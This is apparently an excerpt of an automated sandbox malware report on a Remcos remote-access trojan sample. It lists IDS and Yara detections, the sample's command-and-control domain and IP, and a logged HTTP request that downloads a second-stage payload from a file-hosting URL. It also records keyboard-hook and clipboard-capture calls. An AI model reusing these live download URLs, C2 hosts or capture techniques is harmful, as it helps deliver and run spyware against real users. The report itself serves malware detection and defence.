              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50015 -> 192.169.69.26:4610
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:50022 -> 192.169.69.26:4610
              Source: Malware configuration extractorURLs: https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326
              Source: Malware configuration extractorURLs: hafiznor3374.duckdns.org
              Source: Malware configuration extractorIPs: 127.0.0.1
              Source: unknownDNS query: name: hafiznor3374.duckdns.org
              Source: C:\Users\user\Desktop\MeP66xi1AM.exeCode function: 0_2_02B4E2F8 InternetCheckConnectionA,0_2_02B4E2F8
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
              Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 23.237.50.106:443
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 1010.filemail.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04AA4A66 recv,5_2_04AA4A66
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZPyEiYgd91YNEpA&pk_vid=78e1a7301010f2bb173426329896c326 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 1010.filemail.com
              Source: global traffic | DNS traffic detected: DNS query: 1010.filemail.com
              Source: global traffic | DNS traffic detected: DNS query: hafiznor3374.duckdns.org
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: colorcpl.exe | String found in binary or memory: http://geoplugin.net/json.gp
              Source: colorcpl.exe, 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0$
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.sectigo.com0C
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.pmail.com0
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.00000000007CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://1010.filemail.com/Ff
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A7D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://1010.filemail.com/api/fi
              Source: MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020A08000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://1010.filemail.com/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodRSmZP
              Source: MeP66xi1AM.exe, 00000000.00000002.2192520767.000000000083F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://1010.filemail.com:443/api/file/get?filekey=dAWD3W4ZqhHDbRXt7CgL2IlSxiQV7KpZjZL_g0O13OfgQpodR
              Source: MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF23000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021A81000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172388390.000000007EF99000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2172676264.000000007EEC0000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2210862503.0000000020970000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000003.2173269180.0000000021ADE000.00000004.00000020.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2218431690.0000000021C40000.00000004.00001000.00020000.00000000.sdmp, MeP66xi1AM.exe, 00000000.00000002.2242036581.000000007F5E9000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000002.2335761912.0000000020ABD000.00000004.00001000.00020000.00000000.sdmp, Wnbcdrjt.PIF, 00000007.00000003.2311121461.0000000000797000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
              Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknown | HTTPS traffic detected: 23.237.50.106:443 -> 192.168.2.6:49708 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A89340 SetWindowsHookExA 0000000D,04A8932C,00000000 | 5_2_04A89340
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A8A65A OpenClipboard,GetClipboardData,CloseClipboard | 5_2_04A8A65A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A94EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard | 5_2_04A94EC1
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_04A89468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx | 5_2_04A89468

              E-Banking Fraud

              Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.colorcpl.exe.68d0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.colorcpl.exe.4a80000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 5.2.colorcpl.exe.68d19c5.1.raw.unpack, type: UNPACKEDPE
